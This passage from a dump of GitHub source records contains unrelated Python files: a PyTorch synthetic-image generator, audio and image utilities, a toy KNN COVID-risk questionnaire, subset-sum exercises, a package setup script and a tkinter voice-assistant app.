logits=lambda_r)\n if d['return_sampler']:\n return bern\n else:\n parameters = bern.rsample([batch_size])\n else:\n raise NotImplementedError(\n '{} not implemented in sampling.'.format(family))\n return parameters\n\n def argmax(self, one_hot):\n \"\"\"Differentiable argmax trick.\"\"\"\n oh_shape = one_hot.shape\n if len(oh_shape) == 2:\n inds = torch.arange(\n 1,\n oh_shape[1] + 1,\n dtype=one_hot.dtype,\n requires_grad=True).reshape(1, -1).to(self.device)\n return (inds.repeat(oh_shape[0], 1) * one_hot).max(-1)[0] - 1\n elif len(oh_shape) == 3:\n inds = torch.arange(\n 1,\n oh_shape[1] + 1,\n dtype=one_hot.dtype,\n requires_grad=True).reshape(1, 1, -1).to(self.device)\n return (inds.repeat(\n oh_shape[0], inds.shape[-1], 1) * one_hot).max(-1)[0] - 1\n elif len(oh_shape) == 1:\n return (torch.arange(1, oh_shape[0] + 1, dtype=one_hot.dtype, requires_grad=True).to(self.device) * one_hot).max()[0] - 1 # noqa\n else:\n raise NotImplementedError(len(oh_shape))\n\n def set_trainable(self):\n \"\"\"Set the data generator to train appropriate variables.\"\"\"\n self.batch_grad = True\n\n def set_not_trainable(self):\n \"\"\"Set the data generator to train appropriate variables.\"\"\"\n self.batch_grad = False\n\n def sample_batch(\n self,\n batch_size,\n target_rng=255.):\n \"\"\"\n Sample a batch.\n\n batch_size: (int) size of batch\n\n Returns\n\n batch: (tensor)\n labels: (tensor)\n params: (dict) the sampled parameters for images in this batch\n\n Hold object properties constant for now across +/- samples. 
Fix later.\n \"\"\"\n if not torch.is_tensor(target_rng):\n target_rng = torch.tensor(target_rng).float()\n if self.siamese:\n image_batch = torch.zeros((\n batch_size,\n self.img_size,\n self.img_size,\n 2), requires_grad=self.batch_grad)\n else:\n image_batch = torch.zeros((\n batch_size,\n self.img_size,\n self.img_size), requires_grad=self.batch_grad)\n image_batch = image_batch.to(self.device)\n label_batch = torch.zeros(\n (batch_size, 1), dtype=torch.long, device=self.device)\n num_object_ps = self.sample_lambda0_r(\n batch_size=batch_size,\n d=self.dists[0])\n num_objects = num_object_ps.rsample([batch_size]).abs()\n if self.dists[0]['family'] == 'categorical':\n num_objects = self.st_op(num_objects)\n obj_cat = torch.arange(\n 1,\n num_objects.shape[-1] + 1,\n dtype=num_objects.dtype,\n requires_grad=True).to(self.device)\n obj_cat = obj_cat.reshape(1, -1, 1, 1)\n obj_cat = obj_cat.repeat(batch_size, 1, 1, 1)\n num_objects = (obj_cat * num_objects.reshape(\n batch_size, self.max_objects, 1, 1)).sum(1, keepdims=True)\n num_objects = torch.abs(\n torch.clamp(-(obj_cat - self.min_objects - num_objects), 0, 1))\n elif self.dists[0]['family'] == 'relaxed_bernoulli':\n num_objects = num_object_ps.rsample([batch_size])\n num_objects = self.st_op(num_objects)\n num_objects[:, :self.min_objects] = 1.\n elif (\n 'gaussian' in self.dists[0]['family'] or\n 'normal' in self.dists[0]['family']):\n num_objects = (\n num_objects.round() - num_objects).detach() + num_objects\n num_objects = torch.clamp(\n num_objects.reshape(-1, 1, 1, 1),\n self.min_objects,\n self.max_objects)\n obj_cat = torch.arange(\n 1,\n self.max_objects + 1,\n dtype=num_objects.dtype,\n requires_grad=True).to(self.device)\n obj_cat = obj_cat.reshape(1, -1, 1, 1)\n obj_cat = obj_cat.repeat(batch_size, 1, 1, 1)\n num_objects = torch.abs(torch.clamp(-(obj_cat - self.min_objects + 1 - num_objects), 0, 1)) # noqa\n else:\n raise NotImplementedError(self.dists[0]['family'])\n dynamic_range_ps = self.sample_lambda0_r(\n batch_size=batch_size,\n d=self.dists[2],\n offset=self.min_dynamic_range) # Dist object... 
used to have + 2\n dynamic_range = torch.tanh(\n dynamic_range_ps.rsample((\n batch_size, self.max_objects, self.img_size, self.img_size)))\n object_size_ps = self.sample_lambda0_r(\n batch_size=batch_size,\n d=self.dists[1],\n offset=1)\n if self.one_object_size_per_batch:\n object_sizes = object_size_ps.rsample([batch_size]).abs()\n if self.dists[1]['family'] == 'categorical':\n object_sizes = self.argmax(self.st_op(object_sizes))\n else:\n object_sizes = object_size_ps.rsample(\n [batch_size, self.max_objects]).abs()\n if self.dists[1]['family'] == 'categorical':\n object_sizes = self.st_op(object_sizes)\n object_sizes = self.argmax(object_sizes)\n elif (\n 'gaussian' in self.dists[1]['family'] or\n 'normal' in self.dists[1]['family']):\n object_sizes = (\n object_sizes.round() -\n object_sizes).detach() + object_sizes\n else:\n raise NotImplementedError(self.dists[1]['family'])\n object_sizes = object_sizes + self.min_object_size\n object_radiuses = torch.clamp(\n object_sizes, self.min_object_size, self.max_object_size)\n y_range = torch.arange(0, self.img_size).to(self.device) # v1\n x_range = torch.arange(0, self.img_size).to(self.device) # v1\n yys, xxs = torch.meshgrid(y_range, x_range) # v1\n yys = yys.unsqueeze(0).repeat(self.max_objects, 1, 1).float() # v1\n xxs = xxs.unsqueeze(0).repeat(self.max_objects, 1, 1).float() # v1\n gau = self.sample_lambda0_r(d=self.dists[3], batch_size=batch_size)\n\n # Object location grids -- See (1) below for explanation\n cyys, cxxs = torch.meshgrid(torch.arange(self.grid_res), torch.arange(self.grid_res))\n adj_ceil = self.img_size - self.max_object_size\n # y_offset = (self.img_size - cyys.max()) / 2\n # x_offset = (self.img_size - cxxs.max()) / 2\n # cyys = cyys + y_offset\n # cxxs = cxxs + x_offset\n loc_grid = torch.stack([cyys.reshape(-1), cxxs.reshape(-1)]).to(self.device)\n for bidx in range(batch_size):\n # Sample size of objects\n object_radius = object_radiuses[bidx]\n lab = (torch.rand(1) > .5).float()\n if lab == 1 and not self.one_object_size_per_batch:\n object_radius[1] = object_radius[0] # Copy the sizes\n\n # (1) Create a grid of locations, where objects will be placed\n # Random uniform per location, then select the self.max_objects top locations\n # Scale the positions of the grid (plus random jitter)\n # Choose the selected object locations in the masking step below\n positions = torch.rand(loc_grid.shape[1], requires_grad=False, device=self.device)\n position_thresh = torch.argsort(positions)[:self.max_objects]\n\n # Gradient for spatial scale comes from here:\n # coords = loc_grid[position_thresh]\n loc_scale = gau.rsample([2]) # .abs()\n loc_scale = (loc_scale.ceil() - loc_scale).detach() + loc_scale\n coords = loc_grid * loc_scale.reshape(-1, 1)\n max_coords = coords.max(1)[0]\n y_offset = ((self.img_size - max_coords[0]) / 2).floor()\n x_offset = ((self.img_size - max_coords[1]) / 2).floor()\n coords = coords[:, position_thresh] + torch.stack((y_offset, x_offset)).reshape(-1, 1)\n coords = torch.clamp(coords, 0, adj_ceil)\n\n # Draw objects\n by = coords[0].reshape(self.max_objects, 1, 1)\n bx = coords[1].reshape(self.max_objects, 1, 1)\n obj_d = torch.pow(yys - by, 2) + torch.pow(xxs - bx, 2)\n if self.one_object_size_per_batch:\n obj_mask = torch.clamp(\n ((object_radius.reshape(\n 1, 1, 1) + 1) - obj_d), 0, 1)\n else:\n obj_mask = torch.clamp(\n ((object_radius.reshape(\n self.max_objects, 1, 1) + 1) - obj_d), 0, 1)\n obj = obj_mask * dynamic_range[bidx]\n if lab == 1:\n q_idx = torch.nonzero(obj[0]) # Query\n t_idx 
= torch.nonzero(obj[1]) # Target\n same_tex = dynamic_range[bidx, 0, q_idx[:, 0], q_idx[:, 1]]\n obj[1, t_idx[:, 0], t_idx[:, 1]] = same_tex\n\n # Mask to only show num_objects locations\n if self.dists[0]['family'] == 'categorical':\n obj = obj * num_objects[bidx]\n else:\n obj = obj * num_objects[bidx].reshape(\n self.max_objects, 1, 1)\n\n # Aggregate the batch\n if self.siamese:\n image_batch[bidx, ..., 0] = obj[0]\n image_batch[bidx, ..., 1] = obj[1:].sum(0)\n else:\n image_batch[bidx] = obj.sum(0)\n\n # Change task to SR if requested\n if self.task == 'sr':\n masked_coords = coords.detach() * num_objects[bidx].detach().squeeze(-1) # noqa\n masked_coords = masked_coords[torch.nonzero(masked_coords.sum(-1))] # noqa\n masked_coords = masked_coords.reshape(-1, 2)\n es, vs = torch.eig(utils.cov(masked_coords), eigenvectors=True)\n # theta = torch.atan2(v[1, 0], v[0, 0]) * (180. / math.pi)\n sorted_es = torch.argsort(\n es[:, 0], dim=0, descending=True) # Only real part\n vs = vs[:, sorted_es] # Column vectors\n theta = torch.atan2(\n torch.abs(vs[1, 0]), vs[0, 0]) * (180. / math.pi)\n lab = 0\n if theta >= 45 and theta < 135 or theta >= 225 and theta < 315:\n lab = 1 # what is the elegant way of doing this ^^\n label_batch[bidx] = lab\n\n # Hardcode the normalization\n image_batch = torch.repeat_interleave(\n image_batch.unsqueeze(1), 3, dim=1)\n image_batch = (image_batch + 1.) / 2.\n image_batch = image_batch - self.norm_mean\n image_batch = image_batch / self.norm_std\n\n # image_batch = utils.normalize_fun(\n # image_batch,\n # reshape=self.reshape,\n # mean=self.norm_mean,\n # std=self.norm_std)\n # # Convert labels to one-hot\n # y = torch.eye(self.num_classes).to(self.device)\n # label_batch = y[label_batch].squeeze(1).long()\n del yys # v1\n del xxs # v1\n del y_range, x_range\n return image_batch, label_batch.squeeze()\n\n","repo_name":"drewlinsley/genadv","sub_path":"data_generators/psvrt.py","file_name":"psvrt.py","file_ext":"py","file_size_in_byte":35415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13612376571","text":"# the following is to play music on google colab\nfrom music21 import *\nfrom midi2audio import FluidSynth\n\ndef score_to_wav(score, filename):\n mf = midi.translate.streamToMidiFile(score)\n mf.open('music.mid', 'wb')\n mf.write()\n mf.close()\n # Convert midi to audio\n FluidSynth().midi_to_audio('music.mid', filename)\n\n # Play the audio file\n return filename","repo_name":"BZoennchen/musical-interrogation","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73630581447","text":"import cv2\nimport os\nimport shutil\nfrom numpy import mean\nfrom tqdm import tqdm\n\n\ndef info(image_path):\n \"\"\"\"\"\"\n image_test = cv2.imread(image_path)\n b_mean = mean(image_test[:, :, 0])\n g_mean = mean(image_test[:, :, 1])\n r_mean = mean(image_test[:, :, 2])\n return int(b_mean), int(g_mean), int(r_mean)\n\n\ndef check(image_path, threshold=300):\n return True if sum(info(image_path)) > threshold else False\n\n\ndef copy(source_root, origin_target_root, violet_target_root):\n \"\"\"\"\"\"\n image_name_list = os.listdir(source_root)\n\n for image_name in tqdm(image_name_list):\n\n # get image path\n source_image_path = os.path.join(source_root, image_name)\n if check(source_image_path):\n target_image_path = os.path.join(violet_target_root, image_name)\n 
shutil.copy(source_image_path, target_image_path)\n else:\n target_image_path = os.path.join(origin_target_root, image_name)\n shutil.copy(source_image_path, target_image_path)\n\n\nif __name__ == '__main__':\n\n def mkdir(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\n\n origin_query_path = \"/tmp/data/origin/query\"\n origin_gallery_path = \"/tmp/data/origin/bounding_box_test\"\n\n violet_query_path = \"/tmp/data/violet/query\"\n violet_gallery_path = '/tmp/data/violet/bounding_box_test'\n\n query_B = \"/tmp/data/test/query_B\"\n gallery_B = \"/tmp/data/test/gallery_B\"\n\n mkdir(origin_query_path)\n mkdir(origin_gallery_path)\n mkdir(violet_query_path)\n mkdir(violet_gallery_path)\n\n # query\n copy(\n source_root=query_B,\n origin_target_root=origin_query_path,\n violet_target_root=violet_query_path,\n )\n copy(\n source_root=gallery_B,\n origin_target_root=origin_gallery_path,\n violet_target_root=violet_gallery_path,\n )\n","repo_name":"yuzhijun2/NAIC_reid_challenge_rank14_rank25","sub_path":"get_violet_test.py","file_name":"get_violet_test.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12723078799","text":"# k neares neghbour\r\n# coded by PR@$OON KU$#W@#@\r\n\r\ndef calculate_distance(x1, x2, x3, x4, x5, dataset):\r\n distances = []\r\n for data in dataset:\r\n dist = ((x1 - data[0]) ** 2 + (x2 - data[1]) ** 2 + (x3 - data[2]) ** 2 +\r\n (x4 - data[3]) ** 2 + (x5 - data[4]) ** 2) ** 0.5\r\n distances.append(dist)\r\n return distances\r\n\r\n\r\ndef get_input(prompt, valid_range=None):\r\n while True:\r\n try:\r\n user_input = int(input(prompt))\r\n if valid_range is not None and user_input not in valid_range:\r\n raise ValueError\r\n return user_input\r\n except ValueError:\r\n print(\"Invalid input. Please enter a valid value.\")\r\n\r\n\r\ndef main():\r\n dataset = [[37.0, 1, 4, 3, 0, 'highrisk'], [36.5, 0, 2, 2, 0, 'highrisk'], [36.5, 0, 0, 1, 1, 'lowrisk'],\r\n [37.2, 1, 2, 2, 0, 'moderate'], [36.8, 1, 5, 3, 1, 'highrisk'], [37.5, 0, 0, 0, 0, 'lowrisk'],\r\n [36.91, 1, 1, 0, 1, 'moderate'], [37.3, 0, 5, 3, 1, 'highrisk'], [36.3, 0, 2, 1, 1, 'lowrisk'],\r\n [37.1, 1, 4, 3, 1, 'highrisk'], [36.5, 0, 3, 2, 1, 'highrisk'], [37.3, 1, 1, 2, 1, 'moderate'],\r\n [37.0, 0, 0, 1, 1, 'lowrisk'], [36.4, 1, 0, 1, 0, 'lowrisk'], [37.6, 1, 3, 3, 0, 'highrisk'],\r\n [37.2, 0, 1, 0, 0, 'moderate'], [37.2, 0, 1, 0, 0, 'moderate'], [36.5, 0, 0, 1, 1, 'lowrisk'],\r\n [36.9, 1, 0, 0, 0, 'lowrisk'], [36.7, 0, 5, 1, 0, 'moderate'], [35.9, 1, 0, 0, 0, 'lowrisk'],\r\n [37.0, 1, 2, 0, 1, 'moderate'], [36.5, 0, 0, 1, 0, 'lowrisk'], [36.7, 1, 5, 6, 0, 'highrisk'],\r\n [37.1, 0, 2, 1, 1, 'moderate'], [36.39, 1, 1, 1, 0, 'moderate'], [37.2, 0, 0, 0, 1, 'lowrisk'],\r\n [37.3, 0, 2, 1, 0, 'moderate'], [37.5, 0, 1, 2, 0, 'moderate'], [36.8, 1, 0, 2, 0, 'lowrisk'],\r\n [36.7, 0, 4, 3, 0, 'highrisk'], [36.4, 0, 0, 1, 1, 'moderate'], [37.0, 0, 2, 3, 0, 'moderate']]\r\n \r\n\r\n while True:\r\n bodytemp = float(input('Enter the temperature of your body 🌡 '))\r\n if not (35 <= bodytemp <= 42.5):\r\n print('Invalid temperature. Please enter a valid body temperature (35°C to 42.5°C).')\r\n continue\r\n\r\n intervisit = get_input('Do you have any international visits? ✈️ (1 for YES, 0 for NO): ', [0, 1])\r\n\r\n Ssym = get_input('How many symptoms do you have out of the following? 🤧 \\n'\r\n '1. Difficulty in breathing\\n2. Chest pain\\n3. Loss of speech or movement\\n'\r\n '4. Fever\\n5. 
Dry cough\\n', range(0, 6))\r\n\r\n Csym = get_input('How many symptoms do you have out of the following? 🤒 \\n'\r\n '1. Sore throat\\n2. Loss of taste/smell\\n3. Headache\\n4. Discoloration of finger or toes\\n'\r\n '5. Rashes\\n6. Diarrhea\\n', range(0, 6))\r\n\r\n IntCovid = get_input('Have you had any interaction with a COVID+ patient? 🏥 (1 for YES, 0 for NO): ', [0, 1])\r\n\r\n distances = calculate_distance(bodytemp, intervisit, Ssym, Csym, IntCovid, dataset)\r\n sorted_distances, sorted_risk = zip(*sorted(zip(distances, [data[5] for data in dataset])))\r\n\r\n n1 = sorted_risk[:7].count('lowrisk')\r\n n2 = sorted_risk[:7].count('moderate')\r\n n3 = sorted_risk[:7].count('highrisk')\r\n\r\n print('\\n======================== RESULT ===============================\\n')\r\n if n1 > n2 and n1 > n3:\r\n print('Low risk, stay at home 🏠')\r\n elif n2 > n1 and n2 > n3:\r\n print('Moderate risk is there, you must have a checkup')\r\n elif n3 > n1 and n3 > n2:\r\n print('High risk, urgent checkup required')\r\n\r\n print('\\n=========================== ================================\\n')\r\n x = input('\\nDo you want to continue the program? (Type \"NO\" to exit, press Enter to continue): ')\r\n if x.strip().lower() == 'no':\r\n break\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","repo_name":"Prasoon-kushwaha/COVID-19-Prediction-ML-KNN","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"14286759567","text":"def set_sum_naive(nums, target): # O(2^n * n) time, O(n) space\n def helper(left, s, i):\n if not left:\n return s\n if i == len(nums) or left < 0:\n return \n attempt = helper(left - nums[i], s + [i], i + 1) # inline append O(n)\n return attempt or helper(left, s, i + 1) \n\n s = helper(target, [], 0)\n if s is not None:\n return [nums[i] for i in s]\n\nprint(set_sum_naive([12, 1, 61, 5, 9, 2], 24))\n\ndef set_sum_naive2(nums, target): # O(2^n) time, O(n) space\n s = [0] * len(nums)\n def helper(left, i):\n if not left:\n return 1\n if i == len(nums) or left < 0:\n return \n \n s[i] = 1\n attempt = helper(left - nums[i], i + 1)\n if attempt is not None:\n return attempt\n \n s[i] = 0\n return helper(left, i + 1)\n\n helper(target, 0)\n if s is not None:\n return [nums[i] for i in range(len(s)) if s[i] != 0]\n\nprint(set_sum_naive2([12, 1, 61, 5, 9, 2], 24))\n\ndef set_sum_naive3(nums, target): # O(2^n) time, O(1) space\n s = 0 \n def helper(left, i):\n if not left:\n return 1\n if i == len(nums) or left < 0:\n return \n \n nonlocal s \n s = s | 1 << i \n attempt = helper(left - nums[i], i + 1)\n if attempt is not None:\n return attempt\n \n s = s & ~(1 << i)\n return helper(left, i + 1)\n\n helper(target, 0)\n if s:\n return [nums[i] for i in range(len(nums)) if (s & 1 << i) != 0]\n \nprint(set_sum_naive3([12, 1, 61, 5, 9, 2], 24))\n\ndef set_sum(nums, target): # O(n*k) time, O(n*k) space, not sure fully correct since we lose knowledge of some old options as we iterate\n mem = [[0] * (len(nums) + 1) for _ in range(target + 1)]\n for i, num in enumerate(nums, 1):\n for j in range(target + 1):\n if j >= num and mem[j - num][i - 1]: # losing option if mem[j][i - 1] was valid without num\n mem[j][i] = mem[j - num][i - 1] | (1 << (i - 1))\n elif mem[j][i - 1]:\n mem[j][i] = mem[j][i - 1]\n elif j == num:\n mem[j][i] = 1 << (i - 1) \n if mem[-1][-1]:\n return [nums[i] for i in range(len(nums)) if (mem[-1][-1] & 1 << i) != 
0]\n\nprint(set_sum([12, 1, 61, 5, 9, 2], 24))\n \n \n \n","repo_name":"nikhilro/daily-coding-problem","sub_path":"p42.py","file_name":"p42.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32139886159","text":"from setuptools import setup\n\nrequirements = []\nf = open('requirements.txt', 'r')\nwhile True:\n l = f.readline()\n if l == '':\n break\n requirements.append(l.rstrip())\nf.close()\n\nsql_requirements = []\nf = open('sql_requirements.txt', 'r')\nwhile True:\n l = f.readline()\n if l == '':\n break\n sql_requirements.append(l.rstrip())\nf.close()\n\ntest_requirements = []\nf = open('test_requirements.txt', 'r')\nwhile True:\n l = f.readline()\n if l == '':\n break\n test_requirements.append(l.rstrip())\nf.close()\n\nf = open('README.md', 'r')\ndescription = f.read()\nf.close()\n\nsetup(\n name=\"funga-eth\",\n version=\"0.7.4\",\n description=\"Ethereum implementation of the funga keystore and signer\",\n author=\"Louis Holbrook\",\n author_email=\"dev@holbrook.no\",\n packages=[\n 'funga.eth.signer',\n 'funga.eth',\n 'funga.eth.cli',\n 'funga.eth.keystore',\n 'funga.eth.runnable',\n ],\n install_requires=requirements,\n extras_require={\n 'sql': sql_requirements,\n },\n tests_require=test_requirements,\n entry_points = {\n 'console_scripts': [\n 'funga-ethd=funga.eth.runnable.signer:main',\n 'eth-keyfile=funga.eth.runnable.keyfile:main',\n 'eth-sign-msg=funga.eth.runnable.msg:main',\n ],\n },\n url='https://git.defalsify.org/funga-eth',\n include_package_data=True,\n long_description=description,\n long_description_content_type='text/markdown',\n )\n","repo_name":"chaintool-py/funga-eth","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7497778012","text":"from os import path\n\nfrom jargon_py.query import one\n\nfrom pyle.framework import get_param, \\\n load_markup, \\\n load_file_module, \\\n TargetInfo\nfrom pyle.framework.loader import Loader\n\n\nclass Application:\n @property\n def name(self):\n return self.__app_cnf['name']\n\n @property\n def target(self):\n return self.__app_cnf['target']\n\n @property\n def views(self):\n return self.__app_cnf['views']\n\n def __init__(self, app_info):\n \"\"\"\n Application loads the file containing json markup to initialize the application.\n\n :param app_info: application target information including the app module and name\n of the app's json markup file.\n\n :return:\n \"\"\"\n markup = load_markup(app_info.target)\n self.__app_cnf = {\n 'name': get_param(str, one(markup['application']), 'n', func=lambda s: s.replace(\"'\", \"\")),\n 'views': load_file_module(app_info.target)\n }\n self.__set_target_path(markup)\n\n self.mainloop = self.__run\n\n def __set_target_path(self, markup):\n views = self.__app_cnf['views']\n target_path = get_param(str, one(markup['application']), 't',\n func=lambda s: '{dir}\\\\{file}.jss'.format(dir=path.dirname(views.__file__),\n file=s.split('.')[-1]))\n\n self.__app_cnf.update({'target': target_path})\n\n def __run(self):\n view_info = TargetInfo(self.__app_cnf['views'], self.__app_cnf['target'])\n loader = Loader(view_info)\n 
loader.run()\n","repo_name":"razorware/pyxelbox","sub_path":"pyle/bootstrap/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9110061789","text":"from tkinter import *\r\nfrom tkinter import ttk\r\nimport speech_recognition as sr\r\nimport pyttsx3\r\nimport yagmail\r\nimport pygame\r\nimport os\r\nfrom tkinter import filedialog\r\nimport tkinter.messagebox\r\nimport webbrowser\r\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\r\nimport random\r\n\r\nrootp=Tk()\r\nrootp.title(\"Welcome Page\")\r\nrootp.geometry(\"600x470\")\r\nrootp.resizable(False,False)\r\n\r\ndef music_player():\r\n rootp.withdraw()\r\n nw1=Tk()\r\n nw1.title(\"Welcome to Music Player\")\r\n nw1.geometry(\"697x250+300+220\")\r\n## nw1.resizable(False,False)\r\n\r\n pygame.init()\r\n # Initiating Pygame Mixer\r\n pygame.mixer.init()\r\n # Declaring track Variable\r\n # Declaring track Variable\r\n track = StringVar()\r\n # Declaring Status Variable\r\n status = StringVar()\r\n \r\n def play():\r\n # Displaying Selected Song title\r\n track.set(playlist.get(ACTIVE))\r\n # Displaying Status\r\n status.set(\"-Playing\")\r\n # Loading Selected Song\r\n pygame.mixer.music.load(playlist.get(ACTIVE))\r\n # Playing Selected Song\r\n pygame.mixer.music.set_volume(0.1)\r\n #print(pygame.mixer.music.get_volume())\r\n pygame.mixer.music.play(-1)\r\n pausebtn['text'] = \"PAUSE\"\r\n\r\n def pause():\r\n # unpause and pause\r\n unpause = True\r\n if(unpause):\r\n # Displaying Status\r\n status.set(\"-Paused\")\r\n pausebtn['text'] = \"PAUSED\"\r\n # Paused Song\r\n pygame.mixer.music.pause()\r\n unpause = False\r\n \r\n def stop():\r\n # Displaying Status\r\n status.set(\"-Stopped\")\r\n # Stopped Song\r\n pygame.mixer.music.stop()\r\n\r\n def openl():\r\n path = filedialog.askdirectory()\r\n # Changing Directory for fetching Songs\r\n \r\n try:\r\n os.chdir(path)\r\n except:\r\n tkinter.messagebox.showerror(\"Error\",\"You didn't select any folder\")\r\n \r\n # Fetching Songs\r\n songtracks = os.listdir()\r\n # Inserting Songs into Playlist\r\n playlist.delete(0,END)\r\n for track in songtracks:\r\n if track.endswith('.mp3'):\r\n playlist.insert(END, track)\r\n\r\n def homebtn():\r\n nw1.withdraw()\r\n rootp.deiconify()\r\n \r\n # title frame\r\n track_frame = LabelFrame(nw1,text=\"Song Track\",font=(\"times new roman\",15,\"bold\"),bg=\"blue\",fg=\"white\",bd=5,relief=GROOVE)\r\n track_frame.place(x=0,y=0,width=400,height=100)\r\n \r\n # Inserting Song Track Label\r\n songtrack = Label(track_frame, textvariable=track ,width=23, font=(\"times new roman\",15,\"bold\"),bg=\"blue\", fg=\"gold\")\r\n songtrack.place(x=0,y=10)\r\n\r\n # Inserting Status Label\r\n trackstatus = Label(track_frame, textvariable=status ,width=10, font=(\"times new roman\", 15, \"bold\"), bg=\"blue\",fg=\"gold\")\r\n trackstatus.place(x=280,y=10)\r\n\r\n # Creating Button Frame\r\n buttonframe = LabelFrame(nw1, text=\"Control Panel\", font=(\"times new roman\", 15, \"bold\"), bg=\"blue\",fg=\"white\", bd=5, relief=GROOVE)\r\n buttonframe.place(x=0, y=100, width=400, height=150)\r\n # Inserting Play Button\r\n playbtn = Button(buttonframe, text=\"PLAY\", command=play, width=8, height=1,font=(\"times new roman\", 12, \"bold\"), fg=\"navyblue\", bg=\"gold\")\r\n playbtn.place(x=20,y=15)\r\n # Inserting Pause Button\r\n pausebtn = Button(buttonframe, text=\"PAUSE\", command=pause, width=8, 
height=1,font=(\"times new roman\", 12, \"bold\"), fg=\"navyblue\", bg=\"gold\")\r\n pausebtn.place(x=150,y=15)\r\n # Inserting Stop Button\r\n stopbtn = Button(buttonframe, text=\"STOP\", command=stop, width=8, height=1,font=(\"times new roman\", 12, \"bold\"), fg=\"navyblue\", bg=\"gold\")\r\n stopbtn.place(x=280,y=15)\r\n # Inserting Open Button\r\n openbtn = Button(buttonframe, text=\"Open\", command=openl, width=8, height=1,font=(\"times new roman\", 14, \"bold\"), fg=\"black\", bg=\"white\")\r\n openbtn.place(x=80,y=70)\r\n\r\n exitbtn=Button(buttonframe,text=\"Home\",command=homebtn ,width=8,height=1,font=(\"times new roman\", 14, \"bold\"), fg=\"black\", bg=\"white\")\r\n exitbtn.place(x=200,y=70)\r\n # Creating Playlist Frame\r\n songsframe = LabelFrame(nw1, text=\"Song Playlist\", font=(\"times new roman\", 15, \"bold\"), bg=\"blue\",fg=\"white\", bd=5, relief=GROOVE)\r\n songsframe.place(x=400, y=0, width=300, height=250)\r\n # Inserting scrollbar\r\n scrol_y = Scrollbar(songsframe, orient=VERTICAL)\r\n # Inserting Playlist listbox\r\n playlist = Listbox(songsframe, yscrollcommand=scrol_y.set, selectbackground=\"gold\", selectmode=SINGLE,font=(\"times new roman\", 12, \"bold\"), bg=\"silver\", fg=\"navyblue\", bd=5, relief=GROOVE)\r\n # Applying Scrollbar to listbox\r\n scrol_y.pack(side=RIGHT, fill=Y)\r\n scrol_y.config(command=playlist.yview)\r\n playlist.pack(fill=BOTH)\r\n \r\n ##########################\r\n nw1.mainloop()\r\n \r\ndef browser():\r\n rootp.withdraw()\r\n nw2=Toplevel()\r\n nw2.title(\"Web-Browser\")\r\n nw2.geometry(\"400x400\")\r\n nw2.resizable(False,False)\r\n\r\n photo = PhotoImage(file='mic IMG.png').subsample(2,2)\r\n\r\n btn = StringVar()\r\n\r\n def buttonClick():\r\n pygame.init()\r\n pygame.mixer.music.load('chime1.mp3')\r\n pygame.mixer.music.play()\r\n\r\n r = sr.Recognizer ()\r\n r.pause_threshold = 0.7\r\n r.energy_threshold = 400\r\n \r\n engine = pyttsx3.init()\r\n voices = engine.getProperty('voices')\r\n engine.setProperty('voice', voices[0].id)\r\n def talk(text):\r\n engine.say(text)\r\n engine.runAndWait()\r\n \r\n\r\n with sr.Microphone() as source:\r\n try:\r\n r.adjust_for_ambient_noise(source)\r\n audio = r.listen(source, timeout=10)\r\n message = str(r.recognize_google(audio))\r\n pygame.mixer.music.load('chime2.mp3')\r\n pygame.mixer.music.play()\r\n\r\n if btn.get() == 'google':\r\n webbrowser.open('http://google.com/search?q='+message)\r\n\r\n elif btn.get() == 'ytb':\r\n webbrowser.open('https://www.youtube.com/results?search_query='+message)\r\n\r\n else:\r\n pass\r\n\r\n except sr.UnknownValueError:\r\n talk('Google Speech Recognition could not understand audio')\r\n\r\n except sr.RequestError as e:\r\n talk('Could not request results from Google Speech Recognition Service')\r\n\r\n else:\r\n pass\r\n nw2.withdraw()\r\n rootp.deiconify()\r\n\r\n def homebtn2():\r\n nw2.withdraw()\r\n rootp.deiconify()\r\n\r\n Label(nw2,text='WELCOME TO NP ASSISSTANT',relief='ridge',font='times 20 bold italic',fg='black',bg='CadetBlue1').pack()\r\n r1= Radiobutton(nw2, text='Google',font=\"arial 10 bold\", value='google', variable=btn,bg='CadetBlue1')\r\n r1.place(x=70,y=300)\r\n r2= Radiobutton(nw2, text='Youtube', font=\"arial 10 bold\",value='ytb', variable=btn,bg='CadetBlue1')\r\n r2.place(x=250,y=300)\r\n b6 = Button(nw2, image=photo, command=buttonClick, bg='CadetBlue1', activebackground='black', overrelief='groove', relief='sunken')\r\n b6.place(x=150,y=100)\r\n Label(nw2,text=\"Click Me!!!\", font=\"arial 14 
